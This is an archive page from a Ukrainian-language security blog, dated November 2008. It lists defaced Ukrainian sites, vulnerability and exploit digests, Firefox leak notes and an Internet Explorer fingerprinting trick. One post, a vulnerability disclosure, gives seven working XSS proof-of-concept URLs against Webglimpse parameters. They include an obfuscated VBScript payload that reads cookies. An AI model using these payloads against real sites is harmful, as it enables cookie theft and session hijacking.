Архів за Листопад, 2008

Похакані сайти №21

22:46 20.11.2008

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://vgorodke.com.ua (хакером islam_Bey)
  • http://www.svitkomfortu.ua (хакером Player)
  • http://www.newtest.provereno.com.ua (хакерами SpySecurityTeam) - 28.09.2008, зараз сайт не працює
  • http://wxd.com.ua (хакером SheKkoLik) - 01.11.2008, зараз сайт вже виправлений адмінами
  • http://cyouth.com.ua (хакером Beyaz_Hacker) - причому спочатку сайт був похаканий 13.10.2008 хакером Beyaz_Hacker, а 24.10.2008 похаканий Ab1i (зараз сайт вже виправлений адмінами). Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті

Витік умісту зображень в Mozilla Firefox

21:36 20.11.2008

Нещодавно була виявлена можливість витоку вмісту зображень в Mozilla Firefox.

Уразливі версії: Mozilla Firefox 2.0.

Використовуючи getImageData() у сполученні з перенаправленнями можливо одержати міжсайтовий доступ до зображень. Уразливість виправлена в Firefox 2.0.0.18, який нещодавно вийшов.

  • Firefox cross-domain image theft (CESA-2008-009) (деталі)

Добірка уразливостей

20:14 20.11.2008

В даній добірці уразливості в веб додатках:

  • Oracle 11g/10g Installation Vulnerability (деталі)
  • Oracle 0-day to get SYSDBA access (деталі)
  • IceBB 1.0rc6 <= Remote SQL Injection (деталі)
  • IceBB 1.0rc6 <= Remote SQL Injection (деталі)
  • VigileCMS 1.4 Multiple Remote Vulnerabilities (деталі)
  • FairSoft S.Mini web Busines Prelease & Calendar asp Sql injection (деталі)
  • VU Case Manager “Username/Password” SQL Injection (деталі)
  • VU Mailer (Mass Mail) “Password” SQL Injection (деталі)
  • Updated phpMyAdmin packages fix multiple vulnerabilities (деталі)
  • MySpace Scripts - Poll Creator JavaScript Injection Vulnerability (деталі)

XSS уразливості в Webglimpse

23:58 19.11.2008

Сьогодні, після попередніх уразливостей Webglimpse, я знайшов нові Cross-Site Scripting уразливості в локальній пошуковій системі Webglimpse. Дірки виявив на офіційному сайті системи http://webglimpse.net. Про що найближчим часом сповіщу розробників системи.

XSS (IE):

Уразливості в webglimpse.cgi в параметрах case, whole, lines, errors, age, filter і wordspan.

http://site/cgibin/webglimpse.cgi?ID=1&query=12345&case=%22style%3D%22xss:expression(alert(document.cookie))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&whole=%22style%3D%22xss:expression(alert(document.cookie))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&lines=%22style%3D%22xss:expression(alert(document.cookie))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&errors=%22style%3D%22xss:expression(alert(document.cookie))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&age=%22style%3D%22xss:expression(alert(document.cookie))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&filter=%22style%3D%22background-image:url(vbscript:eval(chr(97)%2Bchr(108)%2Bchr(101)%2Bchr(114)%2Bchr(116)%2Bchr(40)%2Bchr(100)%2Bchr(111)%2Bchr(99)%2Bchr(117)%2Bchr(109)%2Bchr(101)%2Bchr(110)%2Bchr(116)%2Bchr(46)%2Bchr(99)%2Bchr(111)%2Bchr(111)%2Bchr(107)%2Bchr(105)%2Bchr(101)%2Bchr(41)))
http://site/cgibin/webglimpse.cgi?ID=1&query=12345&wordspan=%22style%3D%22xss:expression(alert(document.cookie))

Уразливі Webglimpse 2.18.7 та попередні версії.

Витік інформації в Mozilla Firefox

22:41 19.11.2008

В минулому році була виявлена можливість витоку інформації в Mozilla Firefox (information leakage). Про останні уразливості в Firefox я писав нещодавно.

Уразливі версії: Mozilla Firefox 2.0.

За допомогою уразливості можливо одержати значення будь-яких внутрішніх змінних.

  • Firefox 2.0.0.6 Remote Variable Leakage vulnerability (деталі)

Уразливість на board.i.ua

19:23 19.11.2008

13.05.2008

У жовтні, 18.10.2007, я знайшов Cross-Site Scripting уразливість на проекті http://board.i.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно проектів i.ua я писав про уразливість на blog.i.ua.

Детальна інформація про уразливість з’явиться пізніше.

19.11.2008

XSS:

XSS в DOM при кліку на “aвторизироваться”.

Дана уразливість вже виправлена.

Добірка експлоітів

16:34 19.11.2008

В даній добірці експлоіти в веб додатках:

  • Keller Web Admin CMS 0.94 Pro Local File Inclusion Vulnerability (1st) (деталі)
  • Orca 2.0 (params.php) Remote File Inclusion Vulnerability (деталі)
  • A+ PHP Scripts NMS Insecure Cookie Handling Vulnerability (деталі)
  • phpBLASTER CMS 1.0 RC1 Multiple Local File Inclusion Vulnerabilities (деталі)
  • Cheats Complete Website 1.1.1 (itemid) SQL Injection Vulnerability (деталі)
  • Drinks Complete Website 2.1.0 (drinkid) SQL Injection Vulnerability (деталі)
  • Jokes Complete Website 2.1.3 (jokeid) SQL Injection Vulnerability (деталі)
  • Tips Complete Website 1.2.0 (tipid) SQL Injection Vulnerability (деталі)
  • Riddles Complete Website 1.2.1 (riddleid) SQL Injection Vulnerability (деталі)
  • JBC Explorer <= V7.20 RC 1 Remote Code Execution Exploit (деталі)

Визначення Internet Explorer через тег img

22:46 18.11.2008

Як повідомив RSnake в своєму пості Malformed URL in Image Tag Fingerprints Internet Explorer, існує можливість визначення Internet Explorer. Це може знадобитися, коли потрібно буде вияснити яким браузером користується відвідувач сайта, і чи не підробив він свій юзер-агент (чи насправді в нього браузер IE).

Даний метод визначення Internet Explorer використовує тег img. У випадку використання “некоректного” URL до зображення в тезі img, IE (на відміну від інших браузерів) не завантажує зображення.

Адреса зображення, яка видає Internet Explorer :-) має наступний вигляд:

http://ha.ckers.org/%--/../images/kcpimp.jpg

Тобто використовується комбінація символів “%–”, або інший варіант, коли після % йдуть нецифрові символи.

Даний метод дозволяє визначити браузер користувача без використання JavaScript. Методика працює тільки в IE7, в IE6 вона не працює.

Листопадовий вівторок патчів від Microsoft

20:35 18.11.2008

В цьому місяці Microsoft випустила всього два патчі. Що значно менше ніж у жовтні.

У листопадовому “вівторку патчів” Microsoft випустила два патчі. Єдина критична уразливість міститься в компоненті XML Core Services, вона можлива до експлуатації в системах Windows 2000, XP і Vista, а також Server 2003 і 2008. Експлуатація уразливості відбувається при відвідуванні шкідливої веб-сторінки. При наявності Core Services 3.0 нападник одержує право віддалено запускати на виконання довільний код, якщо ж установлена версія 4.0 чи 6.0, то нападник здатний одержати доступ до інформації користувача.

Другий бюлетень усуває уразливість у системі Microsoft Server Message Block (SMB), її експлуатація можлива в Windows 2000, XP, Vista, Server 2003 і Server 2008. При успішному використанні уразливості нападник одержує повний контроль над системою.

По матеріалам http://news.techlabs.by.

Добірка уразливостей

16:28 18.11.2008

В даній добірці уразливості в веб додатках:

  • Sciurus Hosting Panel Code Injection (деталі)
  • Ruby on Rails: Multiple vulnerabilities (деталі)
  • WBR3404TX Broadband Router XSS (деталі)
  • Sciurus Hosting Panel Code Injection (деталі)
  • Myspace Clone Script (index.php) Remote File Inclusion Vulnerability (деталі)
  • Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability (деталі)
  • net-finity (links.php) Remote SQL Injection Vulnerability (деталі)
  • JiRos Upload Manager SQL Injection (деталі)
  • ESA Software S.p.a. Asp/Portal www/archivio.asp Sql injection (деталі)
  • Persistent XSS on Aruba 800 Mobility Controller’s login page (деталі)